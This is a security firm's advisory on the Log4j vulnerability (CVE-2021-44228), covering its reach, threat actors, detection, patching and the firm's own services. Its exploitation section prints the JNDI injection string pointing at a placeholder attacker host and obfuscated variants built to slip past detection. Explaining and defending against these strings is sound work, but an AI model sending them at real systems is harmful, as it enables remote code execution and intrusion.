To help companies detect and mitigate the Log4j vulnerability, Silent Breach is offering a free advisory service. Contact us to learn more.

Overview

The Log4j vulnerability (CVE-2021-44228) is a Java Naming and Directory Interface (JNDI) injection vulnerability that affects Apache Log4j versions 2.0 to 2.14.1. The vulnerability was first made public by security researchers on December 9, 2021 and due to its ease of exploitation and prevalence across enterprise applications, is considered to be one of the most severe software flaws identified in decades.

While it remains difficult to determine the full extent of the compromise, nearly a third of all web servers in the world employ the vulnerable code. These include popular enterprise and consumer technologies such as Twitter, Amazon, Microsoft, Apple, IBM, Oracle, Cisco, Google, and Minecraft. U.S. officials estimate that hundreds of millions of devices have been exposed and that more than 4,000,000 hacking attempts have been made to date, nearly half of which were conducted by malicious groups.

As many Java-based systems incorporate Log4j, organizations are highly encouraged to contact all relevant vendors to ensure that the latest patched version is being used. A list of affected enterprise software is being maintained by the Cybersecurity and Infrastructure Security Agency (CISA) and runs to over 500 items at the time of writing.

Exploitation

CVE-2021-44228 allows unauthenticated remote code execution and is triggered when a particular script is parsed and executed by the vulnerable Log4j component. An example attack code would look something like this:

${jndi:ldap://[attacker site]/a}

However, as security teams work to detect on-going exploitations, attackers are adding obfuscation layers to this attack to evade detection. One such detected pattern uses lower or upper commands within the exploitation script:

{jndi:${lower:l}${lower:d}a${lower:p}
${${::-j}${::-n}${::-d}${::-i}

In this way, an attacker performs an HTTP request against a target system, which generates a log using Log4j 2. This then leverages JNDI to perform a request to the attacker-controlled site. The vulnerability then causes the exploited process to reach out to the site and execute the payload. In many observed attacks, the attacker-owned parameter is a DNS logging system, intended to log a request to the site and fingerprint the vulnerable systems.

Malicious Actors

While the vast majority of detected activity is coming from mass scanning activity by both attackers and security researchers, a number of key malicious actors have been identified as leveraging the Log4j vulnerability. In particular, Silent Breach Labs has observed nation-state actors from China, Turkey, Iran, and North Korea exploiting the Log4j vulnerability. Activities range from experimentation, development, and integration into in-the-wild payload deployments.

Unsurprisingly, the Chinese group behind the 2021 Microsoft breach, HAFNIUM, has already operationalized the vulnerability to attack virtualization infrastructure, further extending their usual targeting. More specifically, HAFNIUM actors were observed employing a DNS service which performs system fingerprinting for testing purposes.

Moreover, a number of access brokers (groups that sell illegitimate access to the highest bidder) have also begun to leverage the CVE-2021-44228 vulnerability. As these breaches make their way into the hands of ransomware-as-a-service affiliates, we can expect a wave of ransomware attacks around the globe, particularly around the holidays.

Detection and Mitigation

Use CISA's Github repository as well as CERT/CC's CVE-2021-44228_scanner to determine whether your organization is vulnerable. If necessary, employ a Managed Security Service Provider to review your exposure.

Review Apache's Log4j Security Vulnerabilities page for additional information and, if appropriate, apply the available patches immediately. Begin by patching mission critical systems, internet-facing systems, and networked servers before moving on to other affected technology assets.

Perform a security review to determine whether any security compromise took place. The log files for any services using affected Log4j versions will contain user-controlled strings.

Consider reporting compromises immediately to CISA and the FBI.

How We Can Help

Silent Breach can help conduct an immediate triage as well as a full audit of your infrastructure to determine whether any malicious activity took place and, if so, how you should respond. Our security team is fully briefed on CVE-2021-44228 and Quantum Armor has been updated to detect the latest IOCs and alert users to any suspicious activity.

In the event that malicious activity is identified on your network, our forensics team will be able to carefully capture and preserve that evidence for further analyses and legal processes. And, in either case, a full report detailing steps taken, discoveries made, and recommended mitigation steps (both short term quick wins and a long term roadmap) will be compiled for internal guidance as well as external stakeholder reassurance.

For more detailed descriptions of Silent Breach's Incident Response programs, please see our Incident Response and Managed Response pages. Or, for more information on how your organization may be impacted by the Log4j vulnerability or for additional guidance, please contact Silent Breach at contact@silentbreach.com.


Similar Reads:
Cybersecurity Survival Guide for Remote Working
Guide to Business Continuity Planning
How to Prepare for the Inevitable Global Cyberattack